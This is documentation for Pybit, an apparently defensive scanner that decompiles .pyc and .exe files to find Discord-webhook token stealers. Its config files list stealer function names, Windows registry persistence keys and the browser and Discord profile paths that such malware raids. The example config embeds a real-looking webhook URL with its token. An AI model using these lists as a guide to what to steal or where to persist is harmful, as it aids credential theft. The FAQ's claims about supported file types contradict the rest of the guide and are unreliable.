Pybit Documentation

Features

  • Webhook Detection: Automatically detects Discord webhooks embedded within malicious code, alerting the user to potential threats.
  • Executable Analysis: Decompiles and analyzes Windows executables (.exe files), identifying hidden malware code that might otherwise be difficult to spot.
  • PYC File Decompiling: Decompiles .pyc files, often used in Python-based malware, to allow users to inspect malicious code and identify vulnerabilities.
  • User-Friendly Interface: Minimal user input required, providing easy-to-understand output and warnings that help mitigate security risks.
  • Fast Processing: Quickly scans files and outputs results, making it easy to scan multiple files in short bursts.
  • Security-Centered: Focused on detecting malicious behavior commonly associated with Discord malware, particularly related to webhook usage.

Getting Started

To get started with Pybit Scanner, simply navigate to the python.org website or follow the steps below

// installation 

download python 3.11 https://www.python.org/downloads/release/python-3110/

Git Clone

Next you can gitclone the repo or download the zip

// Git Clone 

git clone https://github.com/pyinstance/pybit.git
cd pybit

Installing Modules

Next you can Navigate over to the Official Pybit Folder and do open a Command Prompt / Terminal then do the following...

Module installation

 C:\Users\null\Desktop\> cd pybit

 C:\Users\null\Desktop\pybit\>  pip install -r assets/requirements.txt

Config Setup

After Successfully installiing all modules we will now move on to the config before running pybit Navigate over to the 'pybit.py' file


  • Variable called pybit on line 8 it should look something like this

    • Config Setup
pybit = "webhookurl_here"
  • replace the placeholder text 'webhookurl_here' with your actual webhook
  • it should look something like this

    • Config Setup
pybit = "https://discord.com/api/webhooks/1319395046696419328/eE5dBG5fWDmIzajnK4-D8brW-a_hUE9yOZ_fJ35YJJgrlqG7s7LdrP6CbuQeICV49N-i"

  • Now head over to the config folder and make sure both these files are located inside
  • 'config.json'
  • 'path_rules.json'
  • if these files are here then proceed if not go ahead and redownload pybit

  • this should be the contents of both config files
    • config.json contents

{
    "SUSPICIOUS_CONSTANTS": [
        "WEBHOOK_URL",
        "webhook"
    ],
    "SUSPICIOUS_FUNCTIONS": [
        "injection",
        "Injection",
        "Inject",
        "inject",
        "vealol",
        "get_passwords",
        "get_system_info",
        "grabber",
        "grabTokens"
    ],
    "SUSPICIOUS_KEYWORDS": [
        "eval", "exec", "subprocess", "os.system", "import socket", "import requests",
        "import urllib", "open(", "os.popen", "getattr", "input(", "os.fork", "import ftplib"
    ],
    "SUSPICIOUS_REG_KEYS": [
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
        "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment",
        "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\FilePaths"
    ], 
  }
                               
                        

    path_rules.json contents
{
    "paths": {
        "Discord": "C:\\Users\\User\\AppData\\Roaming\\discord",
        "Discord Canary": "C:\\Users\\User\\AppData\\Roaming\\discordcanary",
        "Lightcord": "C:\\Users\\User\\AppData\\Roaming\\Lightcord",
        "Discord PTB": "C:\\Users\\User\\AppData\\Roaming\\discordptb",
        "Opera GX": "C:\\Users\\User\\AppData\\Roaming\\Opera Software\\Opera GX Stable",
        "Chrome": "C:\\Users\\User\\Local\\Google\\Chrome\\User Data\\Default",
        "Microsoft Edge": "C:\\Users\\User\\Local\\Microsoft\\Edge\\User Data\\Default",
        "Firefox": "C:\\Users\\User\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles",
        "Brave": "C:\\Users\\User\\Local\\BraveSoftware\\Brave-Browser\\User Data",
        "Safari": "C:\\Users\\User\\AppData\\Local\\Apple Computer\\Safari\\Safari",
        "Vivaldi": "C:\\Users\\User\\Local\\Vivaldi\\User Data",
        "Yandex": "C:\\Users\\User\\AppData\\Roaming\\Yandex\\YandexBrowser\\User Data",
        "Edge Legacy": "C:\\Users\\User\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE",
        "Epic Privacy Browser": "C:\\Users\\User\\Local\\Epic Privacy Browser\\User Data",
        "SlimJet": "C:\\Users\\User\\Local\\SlimJet\\User Data",
        "Comodo Dragon": "C:\\Users\\User\\Local\\Comodo\\Dragon\\User Data",
        "CyberFox": "C:\\Users\\User\\AppData\\Roaming\\CyberFox\\CyberFox\\Profiles",
        "Opera": "C:\\Users\\User\\AppData\\Roaming\\Opera Software\\Opera Stable"
    },
    "suspicious_directories": [
        "\\Google\\Chrome\\User Data", 
        "\\Opera Software\\Opera Stable",
        "\\Discord", 
        "\\DiscordCanary", 
        "\\Microsoft\\Edge",
        "\\Mozilla\\Firefox\\Profiles", 
        "\\BraveSoftware\\Brave-Browser\\User Data",
        "\\Apple Computer\\Safari", 
        "\\Vivaldi", 
        "\\Yandex",
        "\\Microsoft\\Windows\\INetCache\\IE", 
        "\\Epic Privacy Browser\\User Data",
        "\\SlimJet\\User Data", 
        "\\Comodo\\Dragon\\User Data", 
        "\\CyberFox\\CyberFox\\Profiles",
        "\\Opera Software\\Opera Stable"
    ]
}

  • Now you are ready to run pybit follow these steps below

    • Running Pybit
    
     C:\Users\null\Desktop\> cd pybit
    
     C:\Users\null\Desktop\pybit\> python pybit.py
  • After this is done a text prompt will show the following

    • Running Pybit

C:\Users\null\Desktop\pybit\> Drag and drop the .pyc file here:
  • After you drag your '.pyc' File into the program
  • a summary will be sent to your discord webhook you inputed earlier
  • with everything that was decompiled and extracted from the '.pyc' file your dropped

    • FAQ

    Q: What file types are supported?

    A: We support files with extensions .js, .html, .py, .java, .txt, and .exe (for .NET applications).

    Q: Can I search for specific keywords within the code?

    A: Yes! Our search functionality allows you to find and highlight specific words or patterns within the uploaded code.